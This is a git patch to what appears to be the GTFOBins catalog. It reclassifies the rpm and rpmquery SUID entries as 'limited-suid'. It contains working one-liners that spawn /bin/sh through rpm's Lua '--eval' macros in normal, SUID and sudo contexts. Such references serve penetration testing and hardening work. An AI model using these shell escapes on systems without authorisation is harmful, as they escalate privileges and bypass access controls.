From bb4050810ebf7c71589a89e05c6df4ceae703231 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Sun, 10 Jan 2021 18:25:55 +0100 Subject: [PATCH] Fix rpm[query] SUID --- _gtfobins/rpm.md | 4 ++-- _gtfobins/rpmquery.md | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md index 6b440d7..ba8dafe 100644 --- a/_gtfobins/rpm.md +++ b/_gtfobins/rpm.md @@ -2,8 +2,8 @@ functions: shell: - code: rpm --eval '%{lua:os.execute("/bin/sh")}' - suid: - - code: ./rpm --eval '%{lua:os.execute("/bin/sh", "-p")}' + limited-suid: + - code: ./rpm --eval '%{lua:os.execute("/bin/sh")}' sudo: - code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}' - description: | diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md index 03fe575..aa4a601 100644 --- a/_gtfobins/rpmquery.md +++ b/_gtfobins/rpmquery.md @@ -2,8 +2,8 @@ functions: shell: - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - suid: - - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' + limited-suid: + - code: ./rpmquery --eval '%{lua:os.execute("/bin/sh")}' sudo: - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' ---